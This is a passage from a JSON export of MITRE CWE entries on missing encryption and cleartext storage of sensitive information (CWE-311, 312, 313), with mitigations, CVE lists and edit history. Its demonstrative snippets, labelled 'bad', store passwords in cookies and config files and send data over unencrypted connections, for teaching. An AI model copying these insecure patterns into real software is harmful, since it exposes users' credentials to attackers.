tampering"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["One-way (i.e., only the user or recipient needs to have the key). This can be achieved using public key cryptography, or other techniques in which the encrypting party (i.e., the software) does not need to have access to a private key.","Two-way (i.e., the encryption can be automatically performed on behalf of a user, but the key must be available so that the plaintext can be automatically recoverable by that user). This requires storage of the private key in a format that is recoverable only by the user (or perhaps by the operating system) in a way that cannot be recovered by others."]}}]}},{"attr":{"@_Mitigation_ID":"MIT-24"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.","For example, US government systems require FIPS 140-2 certification.","Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.","Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]"]}},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."},{"attr":{"@_Mitigation_ID":"MIT-33"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This makes it easier to spot places in the code where data is being used that is unencrypted."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-40"},"Intro_Text":"This code writes a user\'s login information to a cookie so the user does not have to login again later.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function persistLogin($username, $password){}","xhtml:div":{"#text":"$data = array(\\"username\\" => $username, \\"password\\"=> $password);setcookie (\\"userdata\\", $data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["The code stores the user\'s username and password in plaintext in a cookie on the user\'s machine. This exposes the user\'s login information if their computer is compromised by an attacker. Even if the user\'s machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie.","Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-41"},"Intro_Text":"The following code attempts to establish a connection, read in a password, then store it to a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error(\\"Unknown host\\");memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length);if (argc < 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error(\\"Connecting\\");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) {","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"write(dfd,password_buffer,n);...","xhtml:br":["","",""]}}}},"Body_Text":"While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors."},{"attr":{"@_Demonstrative_Example_ID":"DX-42"},"Intro_Text":"The following code attempts to establish a connection to a site to communicate sensitive information.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}","xhtml:div":[{"#text":"URL u = new URL(\\"http://www.secret.example.org/\\");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod(\\"PUT\\");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//..."}}],"xhtml:br":""}},"Body_Text":"Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2272","Description":"password and username stored in cleartext in a cookie","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272"},{"Reference":"CVE-2009-1466","Description":"password stored in cleartext in a file with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466"},{"Reference":"CVE-2009-0152","Description":"chat program disables SSL in some circumstances even when the user says to use SSL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152"},{"Reference":"CVE-2009-1603","Description":"Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603"},{"Reference":"CVE-2009-0964","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964"},{"Reference":"CVE-2008-6157","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157"},{"Reference":"CVE-2008-6828","Description":"product stores a password in cleartext in memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828"},{"Reference":"CVE-2008-1567","Description":"storage of a secret key in cleartext in a temporary file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567"},{"Reference":"CVE-2008-0174","Description":"SCADA product uses HTTP Basic Authentication, which is not encrypted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174"},{"Reference":"CVE-2007-5778","Description":"login credentials stored unencrypted in a registry key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778"},{"Reference":"CVE-2002-1949","Description":"Passwords transmitted in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1949"},{"Reference":"CVE-2008-4122","Description":"Chain: Use of HTTPS cookie without \\"secure\\" flag causes it to be transmitted across unencrypted HTTP.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122"},{"Reference":"CVE-2008-3289","Description":"Product sends password hash in cleartext in violation of intended policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3289"},{"Reference":"CVE-2008-4390","Description":"Remote management feature sends sensitive information including passwords in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390"},{"Reference":"CVE-2007-5626","Description":"Backup routine sends password in cleartext in email.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5626"},{"Reference":"CVE-2004-1852","Description":"Product transmits Blowfish encryption key in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1852"},{"Reference":"CVE-2008-0374","Description":"Printer sends configuration information, including administrative password, in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0374"},{"Reference":"CVE-2007-4961","Description":"Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961"},{"Reference":"CVE-2007-4786","Description":"Product sends passwords in cleartext to a log server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4786"},{"Reference":"CVE-2005-3140","Description":"Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3140"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to encrypt data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":4,"Entry_Name":"Insufficient Transport Layer Protection"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC00-J","Entry_Name":"Use SSLSocket rather than Socket for secure data exchange"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"157"}},{"attr":{"@_CAPEC_ID":"158"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"477"}},{"attr":{"@_CAPEC_ID":"609"}},{"attr":{"@_CAPEC_ID":"65"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "Protecting Secret Data" Page 299"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 17: Failure to Protect Stored Data." Page 253"}},{"attr":{"@_External_Reference_ID":"REF-265"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Encryption", Page 43"}},{"attr":{"@_External_Reference_ID":"REF-267"}}]},"Notes":{"Note":{"#text":"There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Encrypt Data","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Encrypt Sensitive Data","attr":{"@_Date":"2010-02-16"}}]}},"312":{"attr":{"@_ID":"312","@_Name":"Cleartext Storage of Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere.","Extended_Description":"Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"922","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker with access to the system could read sensitive information stored in cleartext."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-44"},"Intro_Text":"The following code excerpt stores a plaintext user account ID in a browser cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addCookie( new Cookie(\\"userAccountID\\", acctID);"},"Body_Text":"Because the account ID is in plaintext, the user\'s account information is exposed if their computer is compromised by an attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-40"},"Intro_Text":"This code writes a user\'s login information to a cookie so the user does not have to login again later.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function persistLogin($username, $password){}","xhtml:div":{"#text":"$data = array(\\"username\\" => $username, \\"password\\"=> $password);setcookie (\\"userdata\\", $data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["The code stores the user\'s username and password in plaintext in a cookie on the user\'s machine. This exposes the user\'s login information if their computer is compromised by an attacker. Even if the user\'s machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie.","Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-41"},"Intro_Text":"The following code attempts to establish a connection, read in a password, then store it to a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error(\\"Unknown host\\");memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length);if (argc < 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error(\\"Connecting\\");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) {","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"write(dfd,password_buffer,n);...","xhtml:br":["","",""]}}}},"Body_Text":"While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2272","Description":"password and username stored in cleartext in a cookie","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272"},{"Reference":"CVE-2009-1466","Description":"password stored in cleartext in a file with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466"},{"Reference":"CVE-2009-0152","Description":"chat program disables SSL in some circumstances even when the user says to use SSL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152"},{"Reference":"CVE-2009-1603","Description":"Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603"},{"Reference":"CVE-2009-0964","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964"},{"Reference":"CVE-2008-6157","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157"},{"Reference":"CVE-2008-6828","Description":"product stores a password in cleartext in memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828"},{"Reference":"CVE-2008-1567","Description":"storage of a secret key in cleartext in a temporary file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567"},{"Reference":"CVE-2008-0174","Description":"SCADA product uses HTTP Basic Authentication, which is not encrypted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174"},{"Reference":"CVE-2007-5778","Description":"login credentials stored unencrypted in a registry key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778"},{"Reference":"CVE-2001-1481","Description":"Plaintext credentials in world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481"},{"Reference":"CVE-2005-1828","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828"},{"Reference":"CVE-2005-2209","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209"},{"Reference":"CVE-2002-1696","Description":"Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696"},{"Reference":"CVE-2004-2397","Description":"Plaintext storage of private key and passphrase in log file when user imports the key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397"},{"Reference":"CVE-2002-1800","Description":"Admin password in plaintext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800"},{"Reference":"CVE-2001-1537","Description":"Default configuration has cleartext usernames/passwords in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537"},{"Reference":"CVE-2001-1536","Description":"Usernames/passwords in cleartext in cookies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536"},{"Reference":"CVE-2005-2160","Description":"Authentication information stored in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage of Sensitive Information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, "Protecting Secret Data" Page 299"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Common Vulnerabilities of Encryption", Page 43"}},{"attr":{"@_External_Reference_ID":"REF-172"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-23","Modification_Comment":"updated Abstraction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Plaintext Storage of Sensitive Information","attr":{"@_Date":"2009-01-12"}}}},"313":{"attr":{"@_ID":"313","@_Name":"Cleartext Storage in a File or on Disk","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in a file, or on disk.","Extended_Description":"The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...<connectionStrings></connectionStrings>...","xhtml:br":["",""],"xhtml:div":{"#text":"<add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" />","attr":{"@_style":"margin-left:10px;"}}}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1481","Description":"Cleartext credentials in world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481"},{"Reference":"CVE-2005-1828","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828"},{"Reference":"CVE-2005-2209","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209"},{"Reference":"CVE-2002-1696","Description":"Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696"},{"Reference":"CVE-2004-2397","Description":"Cleartext storage of private key and passphrase in log file when user imports the 